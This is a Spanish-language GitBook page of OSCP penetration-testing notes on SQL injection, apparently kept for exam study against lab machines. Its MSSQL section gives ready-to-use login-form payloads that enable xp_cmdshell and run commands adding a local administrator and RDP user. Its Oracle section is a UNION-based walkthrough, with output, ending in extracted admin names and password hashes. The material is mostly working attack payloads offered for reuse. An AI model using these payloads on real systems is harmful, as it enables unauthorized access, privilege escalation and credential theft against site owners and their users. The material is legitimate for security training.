OSCP Notes
  • OSCP Cheatsheet
  • Sistema de ficheros del OS
    • File Transfers Linux
    • File Transfers Windows
  • Web Attacks
    • Web Enumeration
    • SQL Injection
    • CGI
    • CMS
  • DATABASES
    • MSSQL
    • MYSQL
  • Services Enumeration
    • Trucos Generales
    • POP3 - 110
    • SMB - (445-139)
    • DNS
    • NFS - 2049
    • SMTP - 25
    • TFTP - 69
    • SNMP - (161-162-10161-10162)
  • Privilege Escalation
    • Information Gathering - EscPriv
    • Windows Privilege Escalation
      • MANUAL - Windows PrivEsc
      • Bypass UAC
    • Linux Privilege Escalation
  • Password Attacks
    • Hash Identification
    • Brute Force
    • Pass in the Hash
    • Password Cracking
  • Port Redirection and Tunneling
    • Port Forwarding
    • SSH Tunneling
      • SSH Local Port Forwarding
      • SSH Remote Port Forwarding
      • SSH Dynamic Port Forwarding
  • Active Directory Attacks
    • AD Enumeration
    • AD Authentication
    • AD Lateral Movement
    • AD Vulnerabilidades actuales
    • Powershell Empire
  • Buffer Overflow
    • Linux
    • Windows
      • Spiking
      • Fuzzing
      • Finding the Offset
      • Overwriting The EIP
      • Finding the Bad Charaters
      • Finding The Right Module
      • Generating Shellcode and Gaining Shell
  • Client-Side Attacks
    • Windows Office Macros
  • Post-explotacion
    • Trucos Generales
      • Links Utiles
    • Windows
      • Mimikatz
      • Writeup Esc WinXP SP1 with services
      • POWERSHELL
  • CRTP
    • PowerView
    • Notas Generales
Con tecnología de GitBook
En esta página
  1. Web Attacks

SQL Injection

AnteriorWeb EnumerationSiguienteCGI

Última actualización hace 2 años

MSSQL

MSSQL INJECTION EXAMPLE
## LOGIN-FORM
http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test' or '1'='1
http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; IF (1=1) WAITFOR DELAY '0:0:10'--
http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; WAITFOR DELAY '0:0:10'--

http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; EXEC sp_configure 'show advanced options', 1;--
http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; RECONFIGURE;--
http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; EXEC sp_configure 'xp_cmdshell', 1;--
http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; RECONFIGURE;--

http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; EXEC xp_cmdshell 'net user gerh Pass123 /add';--
http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; EXEC xp_cmdshell 'net localgroup Administrators gerh /add';--
http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; EXEC xp_cmdshell 'net localgroup "Remote Desktop Users" gerh /add';--


http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; EXEC sp_addlogin 'user', 'pass';-- 
SQL ORACLE EXAMPLE
' or '1'='1
' order by 3--
' order by 4-- == RETORNA ERROR
' UNION SELECT 1, 1, 1--
' UNION SELECT 1, 1, 1 from dual--
' UNION SELECT null, null, null from dual--

' UNION SELECT 'XXX', 'ZZZ', null from dual--

' UNION SELECT 'XXX', sys.database_name, null from dual--
Blog entry from XXX with title XE from 0

' UNION SELECT 'XXX', (select banner from v$version where rownum=1), null from dual--
Blog entry from XXX with title Oracle Database 18c Express Edition Release 18.0.0.0.0 - Production from 0

' UNION SELECT 'XXX', table_name, null from all_tables--
Blog entry from XXX with title ALL_UNIFIED_AUDIT_ACTIONS from 0
Blog entry from XXX with title AUDIT_ACTIONS from 0
Blog entry from XXX with title AV_DUAL from 0
Blog entry from XXX with title AW$AWCREATE from 0

' UNION SELECT 'XXX', column_name, null from all_tab_columns where table_name='WEB_USERS'--
Blog entry from XXX with title PASSWORD from 0
Blog entry from XXX with title USER_ID from 0
Blog entry from XXX with title USER_NAME from 0

' UNION SELECT 'XXX', column_name, null from all_tab_columns where table_name='WEB_ADMINS'--
Blog entry from XXX with title ADMIN_ID from 0
Blog entry from XXX with title ADMIN_NAME from 0
Blog entry from XXX with title PASSWORD from 0


' UNION SELECT 'XXX', ADMIN_NAME||PASSWORD, null from WEB_ADMINS--
Blog entry from XXX with title admind82494f05d6917ba02f7aaa29689ccb444bb73f20380876cb05d1f37537b7892 from 0
LogoFull MSSQL Injection PWNageExploit Database
Union based Oracle Injection
LogoWhat is Blind SQL Injection? Tutorial & Examples | Web Security AcademyWebSecAcademy
MSSQL Injection Cheat Sheetpentestmonkey
LogoUsing SQL Injection to Bypass Authentication